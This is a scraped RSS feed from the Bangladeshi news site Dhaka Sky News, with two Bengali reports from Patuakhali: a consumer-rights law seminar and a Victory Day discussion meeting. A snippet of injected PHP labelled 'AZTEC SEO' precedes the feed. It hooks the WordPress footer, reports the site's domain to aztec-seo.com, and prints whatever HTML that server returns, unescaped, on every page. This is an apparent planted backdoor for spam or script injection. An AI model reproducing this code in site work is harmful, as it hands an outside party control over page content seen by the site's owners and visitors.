/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পটুয়াখালী – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Fri, 30 Dec 2022 07:46:36 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 ভোক্তা অধিকার সংরক্ষণে ক্রেতা-বিক্রেতাসহ সবাইকে সচেতন হতে হবে https://www.dhakaskynews.com/bangladesh/2022/12/27/News_ID-3273/ https://www.dhakaskynews.com/bangladesh/2022/12/27/News_ID-3273/#respond Tue, 27 Dec 2022 07:17:34 +0000 https://www.dhakaskynews.com/?p=3273 পটুয়াখালীর জেলা প্রশাসক মোঃ শরীফুল ইসলাম বলেছেন, দেশের স্বার্থে, জনগণের কল্যাণে এবং ক্রেতা ও বিক্রেতাসহ সর্বস্তরের মানুষের স্বার্থে জাতীয় ভোক্তা অধিকার সংরক্ষণ আইন-২০০৯ বাস্তবায়নে সবাইকে সমন্বিতভাবে কাজ করতে হবে। সরকারের পাশাপাশি বেসরকারী ভোক্তা অধিকার সংরক্ষণ বিষয়ক সংগঠনসমূহকে জনসচেতনামূলক কার্যক্রম পরিচালনা করতে হবে।

২৬ ডিসেম্বর সোমবার সকাল সাড়ে ৯টায় জাতীয় ভোক্তা অধিকার সংরক্ষণ আইন-২০০৯ অবহিতকরণ ও বাস্তবায়ন শীর্ষক সেমিনারে প্রধান অতিথির বক্তব্যে তিনি একথা বলেন।

জেলা প্রশাসক দরবার হলে অতিরিক্ত জেলা প্রশাসক (সার্বিক) মোঃ হুমায়ুন কবিরের সভাপতিত্বে সেমিনারে আরো বক্তব্য রাখেন জেলা আওয়ামীলীগের সভাপতি বীর মুক্তিযোদ্ধা কাজী আলমগীর, জেলা ক্যাব-এর সভাপতি সাবেক জেলা পরিষদ চেয়ারম্যান এ্যাডভোকেট সরদার আব্দুর রশিদ, পটুয়াখালী প্রেসক্লাবের সভাপতি কাজী শামসুর রহমান ইকবাল, সাধারণ সম্পাদক মুজাহিদুল ইসলাম প্রিন্স। সেমিনারে স্বাগত বক্তব্য রাখেন জাতীয় ভোক্তা অধিকার সংরক্ষণ অধিদপ্তর পটুয়াখালী জেলার নবাগত সহকারী পরিচালক মোঃ শাহ শোয়াইব মিয়া।

সভায় আরো বক্তব্য রাখেন জেলা বেকারি দোকান মালিক সমিতির সভাপতি সৈয়দ হারুন অর রশিদ, হোটেল মালিক সমিতির সাধারণ সম্পাদক মোঃ রাসেদ খান, ঔষধ মালিক সমিতির সভাপতি ইশতিয়াক আহমেদ রাহাত, চাল ব্যবসায়ী সমিতির সাধারণ সম্পাদক আব্দুল বারেক প্রমুখ।

স্বাগত বক্তব্যে সহকারী পরিচালক মোঃ শাহ শোয়াইব মিয়া বলেন, জানুয়ারী- ২০২২ হতে ডিসেম্বর-২০২২ পর্যন্ত জেলার ১৪৮টি বাজার তদারকিমূলক অভিযান পরিচালনা করে ৩৩২টি ব্যবসায়ী প্রতিষ্ঠানকে ২৩ হাজার ৯৩ লক্ষ ২’শ ৫০ টাকা জরিমানা আরোপ ও আদায় করা হয়েছে। অভিযোগ নিষ্পত্তির মাধ্যমে আদায়কৃত জরিমানা ৪৭ হাজার টাকা ও অভিযোকারীকে প্রদত্ত টাকা ১১,৭৫০ টাকা প্রদান করা হয়েছে।

শাহ শোয়াইব মিয়া আরো জানান, জেলায় উক্ত সময়ে বিভিন্ন ব্যবসায়ী সমিতি, শিক্ষাপ্রতিষ্ঠান ও সাধারণ ভোক্তাদেরকে নিয়ে সেমিনার, গণশুনানি ও মতবিনিময় সভা করা হয়। এছাড়া নাগরিকদের মাঝে অধিকার সংরক্ষণ আইন-২০০৯ সম্পর্কিত লিফলেট, পাম্পলেট এবং স্টিকার বিতরণ ও ভোক্তাদের নিকট থেকে ২২টি লিখিত অভিযোগের মধ্যে ২১টি অভিযোগ নিষ্পত্তি করা হয়েছে।

]]>
https://www.dhakaskynews.com/bangladesh/2022/12/27/News_ID-3273/feed/ 0
মুক্তিযুদ্ধের চেতনার বিকল্প নাই https://www.dhakaskynews.com/bangladesh/2022/12/18/News_ID-3149/ https://www.dhakaskynews.com/bangladesh/2022/12/18/News_ID-3149/#respond Sun, 18 Dec 2022 09:23:27 +0000 https://www.dhakaskynews.com/?p=3149 জাতীয় সংসদের সংরক্ষিত মহিলা আসন ৩২৯ এর সংসদ সদস্য অধ্যাপিকা কাজী কানিজ সুলতানা হেলেন বলেছেন, জাতির জনক বঙ্গবন্ধু শেখ মুজিবুর রহমানের স্বপ্নের সোনার বাংলা বিনির্মাণে মুক্তিযুদ্ধের চেতনা ধারন এবং বঙ্গবন্ধুর দর্শন ব্যতীত সরকার গঠনের বিকল্প নাই। এ জন্য আগামী দিনেও বঙ্গবন্ধুর সুযোগ্য কন্যা প্রধানমন্ত্রী শেখ হাসিনার নেতৃত্বাধীন সরকার গঠনে তরুন প্রজন্মকে মুক্তিযুদ্ধের সঠিক ইতিহাস ও বঙ্গবন্ধুর দর্শন সম্পর্কে জ্ঞানার্জন করে দেশপ্রেমকে জাগ্রত করতে হবে।

১৬ ডিসেম্বর মহান বিজয় দিবস উদযাপন উপলক্ষে দিনব্যাপী বিভিন্ন কর্মসূচী পালন শেষে সন্ধ্যায় পটুয়াখালীর ডিসি স্কোয়ারে জেলা প্রশাসনের উদ্যোগে ‌”জাতির পিতার স্বপ্নের সোনার বাংলা বিনির্মাণে মুক্তিযুদ্ধের চেতনা ধারন ও ডিজিটাল প্রযুক্তির সর্বোত্তম ব্যবহার” শীর্ষক আলোচনা সভা ও সাংস্কৃতিক অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি এ কথা বলেন।

জেলা প্রশাসক মোঃ শরীফুল ইসলামের সভাপতিত্বে সভায় বিশেষ অতিথির বক্তব্য রাখেন পুলিশ সুপার মোঃ সাইদুল ইসলাম বিপিএম-পিপিএম, জেলা আওয়ামী লীগের সভাপতি বীর মুক্তিযোদ্ধা কাজী আলমগীর, সাধারণ সম্পাদক বীর মুক্তিযোদ্ধা ভিপি আব্দুল মান্নান, পৌরসভার মেয়র মহিউদ্দিন আহমেদ, জেলা মুক্তিযোদ্ধা সংসদের সাবেক কমান্ডার এম এ হালিম, জেলা কমিউনিস্ট পার্টির সভাপতি কমরেড মোতালে মোল্লা, জেলা জাসদের সাধারণ সম্পাদক শ ম দেলোয়ার হোসেন দিলিপ, প্রেসক্লাবের সাধারণ সম্পাদক মুজাহিদুল ইসলাম। পরে স্থানীয় শিল্পীদের সমন্বয়ে এক মনোজ্ঞ সাংস্কৃতিক অনুষ্ঠান হয়। এ আয়োজনের জন্য নবাগত জেলা প্রশাসক মোঃ শরীফুল ইসলামের প্রতি কৃতজ্ঞতা প্রকাশ করেন শ্রোতা, দর্শক এবং প্রধান অতিথিসহ বিশিষ অতিথিবৃন্দ।

]]>
https://www.dhakaskynews.com/bangladesh/2022/12/18/News_ID-3149/feed/ 0